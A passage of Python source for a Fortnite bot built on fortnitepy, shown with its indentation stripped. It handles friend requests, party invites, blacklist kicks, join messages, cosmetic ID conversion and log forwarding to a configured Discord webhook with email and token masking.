send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
self.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.owner and data['fortnite']['click_invite']:
for owner in self.owner:
await owner.send(l("click_invite"))
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id) and user.id != self.user.id:
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {self.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if self.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if flag:
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = self.get_user(mimic) or self.get_cache_user(mimic)
if not user:
try:
user = await self.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
setattr(self,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(self,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled']:
try:
await dclient.start(data['discord']['token'])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_before_close(self) -> None:
self.isready = False
self.boot_time = None
send(name(self.user),f'{l("closing")}: {self.user.display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_restart(self) -> None:
self.boot_time = time.time()
send(name(self.user),l("relogin", self.user.display_name),green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_invite(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if not self.isready or not invitation:
return
display_name = name(self.user)
self.add_cache(invitation.sender)
if invitation.sender.id in blacklist and data['fortnite']['blacklist-declineinvite']:
return
if invitation.sender.id in [owner.id for owner in self.owner]:
await self.invitation_accept(invitation)
return
if invitation.sender.id in whitelist and data['fortnite']['whitelist-allowinvite']:
await self.invitation_accept(invitation)
return
if data['loglevel'] == 'normal':
send(display_name,l("invite_from",name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("invite_from2",f'{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]',invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
for owner in self.owner:
if self.party.get_member(owner.id) and data['fortnite']['invite-ownerdecline']:
await self.invitation_decline_owner(invitation)
return
if True in [member.id in whitelist for member in self.party.members] and data['fortnite']['whitelist-declineinvite']:
await self.invitation_decline_whitelist(invitation)
elif not self.acceptinvite:
await self.invitation_decline(invitation)
elif not self.acceptinvite_interval:
await self.invitation_decline_interval(invitation)
else:
await self.invitation_accept(invitation)
async def event_friend_request(self, request: Union[fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend]) -> None:
if not self.isready or not request:
return
display_name = name(self.user)
self.add_cache(request)
if request.outgoing:
send(display_name,l("friend_request_to",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
return
send(display_name,l("friend_request_from",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.acceptfriend is True:
try:
await request.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await request.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("friend_request_decline",name(request)),red,add_d=lambda x:f'>>> {x}')
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if friend.outgoing:
send(display_name,l("friend_accept",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_add",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if data['loglevel'] == 'normal':
send(display_name,l("friend_remove",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_remove",f'{name(friend)} [{platform_to_str(friend.platform)}]'),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members.append({"memberId": member.id, "absoluteMemberIdx": member.position})
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
if data['fortnite']['hide-user']:
if (not member.id in [owner.id for owner in self.owner] and data['fortnite']['show-owner']
and not (member.id in whitelist and data['fortnite']['show-whitelist'])
and not (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['show-bot'])
and member.id != self.user.id):
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
elif data['fortnite']['hide-blacklist']:
if member.id in blacklist:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l('party_member_joined',name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l('party_member_joined',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend']:
for member_ in member.party.members:
try:
if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.joinmessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
mes = eval_format(data['fortnite']['joinmessage'],var)
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.randommessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
randommessage = random.choice(data['fortnite']['randommessage'])
mes = mes = eval_format(randommessage,var)
send(display_name,f'{l("random_message")}: {mes}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(0.1)
if data["fortnite"]["joinemote"]:
try:
await self.change_asset(self.user.id, "Emote", self.eid)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.party.leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_leave(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_left",name(member),member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_left",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
if data['fortnite']['addfriend']:
for member in member.party.members:
if not self.has_friend(member.id) and not self.is_pending(member.id) and not self.is_blocked(member.id) and member.id != self.user.id:
try:
await self.add_friend(member.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
continue
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_confirm(self, confirmation: fortnitepy.PartyJoinConfirmation) -> None:
if not self.isready or not confirmation:
return
self.add_cache(confirmation.user)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_request",name(confirmation.user)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if data['fortnite']['blacklist-autokick'] and confirmation.user.id in blacklist:
try:
await confirmation.reject()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_partyrequest"),red,add_d=lambda x:f'>>> {x}')
else:
try:
await confirmation.confirm()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_partyrequest"),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_kick(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
if self.party.me.leader and member.id != self.user.id and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_kick",name(member.party.leader),name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_kick",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_member_promote(self, old_leader: fortnitepy.PartyMember, new_leader: fortnitepy.PartyMember) -> None:
if not self.isready or not old_leader or not new_leader:
return
self.add_cache(old_leader)
self.add_cache(new_leader)
display_name = name(self.user)
display_name_ = self.is_most()
try:
if new_leader.id == self.user.id:
if data['fortnite']['hide-user']:
await self.hide()
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_promote",name(old_leader),name(new_leader)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_promote",f'{name(old_leader)} [{platform_to_str(old_leader.platform)}/{old_leader.input}]',f'{name(new_leader)} [{platform_to_str(new_leader.platform)}/{new_leader.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if new_leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
for member in self.party.members:
if member.id in blacklist:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_playlist_change(self, party: fortnitepy.ClientParty, before: tuple, after: tuple) -> None:
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,after[0])
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_update", f"{name(member)} [{platform_to_str(member.platform)}/{member.input}]"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id == self.user.id:
return
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_outfit_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_outfit_change(member)
async def event_party_member_backpack_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pet_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_backpack_change(member)
async def event_party_member_pickaxe_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_pickaxe_change(member)
async def event_party_member_emote_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_emoji_change(self, member: fortnitepy.PartyMember, before: str, after: str) -> None:
if not self.isready or not member:
return
await self.party_member_emote_change(member)
async def event_party_member_zombie(self, member: fortnitepy.PartyMember) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_disconnect",name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_disconnect",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]'),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if self.party.me.leader:
try:
await member.kick()
except Exception:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_chatban(self, member: fortnitepy.PartyMember, reason: Optional[str]) -> None:
if not self.isready or not member:
return
self.add_cache(member)
display_name_ = self.is_most()
if display_name_:
if data['loglevel'] == 'normal':
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",name(member.party.leader),name(member),reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
if not reason:
send(display_name_,l("party_member_chatban",name(member.party.leader),name(member)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_chatban2",f'{name(member.party.leader)} [{platform_to_str(member.party.leader.platform)}/{member.party.leader.input}]',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',reason),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_party_update(self, party: fortnitepy.Party) -> None:
if not self.isready or not party:
return
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_update"),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
await process_command(message)
async def event_party_message(self, message: fortnitepy.PartyMessage) -> None:
await process_command(message)
if True: #Functions
def now() -> str:
return datetime.datetime.now().strftime("%H:%M:%S")
def l(key: str, *args: Any, **kwargs: Any) -> Optional[str]:
text = localize.get(key)
if text:
return text.format(*args, **kwargs)
else:
return None
def name(user: Union[fortnitepy.user.UserBase, discord.user.User, WebUser]) -> str:
if data['loglevel'] == 'normal':
return user.display_name
else:
return f"{user.display_name} / {user.id}"
def render_template(file_: str, **kwargs: Any) -> str:
template = env.get_template(file_)
return sanic.response.html(template.render(**kwargs))
def dprint() -> None:
text_max = 1990
while True:
if data['discord-log']:
if data['skip-if-overflow'] and len(storedlogs) >= 50:
storedlogs.clear()
for num,log in enumerate(storedlogs):
try:
username = list(log.keys())[0]
content = list(log.values())[0]
if len(content) > text_max:
if data["omit-over2000"]:
text = content[:text_max] + "..."
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text
}
)
else:
text = [content[i:i+text_max] for i in range(0, len(content), text_max)]
for text_ in text:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': text_
}
)
if res.status_code == 429:
break
else:
continue
break
else:
res = requests.post(
data['webhook'],
json={
'username': username,
'content': content
}
)
if res.status_code == 204:
storedlogs.pop(num)
if res.status_code == 429:
break
except TypeError:
if data['loglevel'] =='debug':
print(red(traceback.format_exc()))
try:
storedlogs.pop(num)
except Exception:
pass
continue
except Exception:
print(red(traceback.format_exc()))
print(red(f"{username}: {content} の送信中にエラーが発生しました"))
continue
time.sleep(5)
def dstore(username: str, content: Any) -> None:
if data['discord-log']:
if data['hide-email']:
for email in data['fortnite']['email']:
content = content.replace(email,len(email)*"X")
if data['hide-token']:
for token in data['discord']['token'].split(','):
content = content.replace(token,len(token)*"X")
if data['hide-webhook']:
for webhook in data['webhook'].split(','):
content = content.replace(webhook,len(webhook)*"X")
if len(storedlogs) > 0:
if list(storedlogs[len(storedlogs)-1].keys())[0] == username:
storedlogs[len(storedlogs)-1][username] += f'\n{content}'
else:
storedlogs.append({username: content})
else:
storedlogs.append({username: content})
def send(user_name: str, content: Any, color: Optional[Callable] = None, add_p: Optional[Callable] = None, add_d: Optional[Callable] = None) -> Optional[str]:
content = str(content)
if not data['no-logs'] or color is red:
if not color:
if not add_p:
print(content)
else:
print(add_p(content))
else:
if not add_p:
print(color(content))
else:
print(color(add_p(content)))
content = discord.utils.escape_markdown(content)
if not add_d:
dstore(user_name,content)
else:
dstore(user_name,add_d(content))
def split_ignore(text: str, ignore: Optional[str] = None) -> list:
temp = ""
text_list = []
for char in text:
if char.split() != []:
temp += char
elif char != ignore:
if temp != "":
text_list.append(temp)
temp = ""
text_list.append("")
if temp != "":
text_list.append(temp)
return text_list
def eval_format(text: str, variables: dict = {}) -> str:
for match in format_pattern.finditer(text):
match_text = match.group()
eval_text = match_text.replace("{","",1)[::-1].replace("}","",1)[::-1]
result = eval(eval_text,globals(),variables)
text = text.replace(match_text,str(result),1)
return text
def get_client_data(id_: str) -> defaultdict:
var = defaultdict(lambda: None)
for client in clients:
if not client.isready:
continue
if client.user.id == id_:
break
else:
return var
party = getattr(client,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(client.friends),
"pending_count": len(client.pending_friends),
"incoming_pending_count": len(client.incoming_pending_friends),
"outgoing_pending_count": len(client.outgoing_pending_friends),
"block_count": len(client.blocked_users),
"display_name": client.user.display_name,
"id": client.user.id,
"boot_time": int(time.time() - dclient.boot_time)
}
)
return var
def get_guild_member_count(id_: Union[str]) -> Optional[int]:
if isinstance(id_,str):
id_ = int(id_)
guild = dclient.get_guild(id_)
if guild is None:
return None
return guild.member_count
def platform_to_str(platform: fortnitepy.Platform) -> Optional[str]:
converter = {
fortnitepy.Platform.WINDOWS: "Windows",
fortnitepy.Platform.MAC: "Mac",
fortnitepy.Platform.PLAYSTATION: "PlayStation",
fortnitepy.Platform.XBOX: "Xbox",
fortnitepy.Platform.SWITCH: "Switch",
fortnitepy.Platform.IOS: "IOS",
fortnitepy.Platform.ANDROID: "Android"
}
return converter.get(platform)
def convert_to_type(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "Outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "Back Bling"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "Pet"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "Harvesting Tool"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "Emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "Emoticon"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "Toy"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "Item"
def convert_to_asset(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "outfit"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "backpack"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "emote"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emote"
elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "emote"
def convert_to_id(text: str) -> Optional[str]:
if True in [text.lower() in commands[key] for key in outfit_keys] or text.lower().startswith("cid_"):
return "cid"
elif True in [text.lower() in commands[key] for key in backpack_keys] or text.lower().startswith("bid_"):
return "bid"
elif True in [text.lower() in commands[key] for key in pet_keys] or text.lower().startswith("petcarrier_"):
return "petcarrier"
elif True in [text.lower() in commands[key] for key in pickaxe_keys] or text.lower().startswith("pickaxe_id"):
return "pickaxe_id"
elif True in [text.lower() in commands[key] for key in emote_keys] or text.lower().startswith("eid_"):
return "eid"
elif True in [text.lower() in commands[key] for key in emoji_keys] or text.lower().startswith("emoji_"):
return "emoji_id"
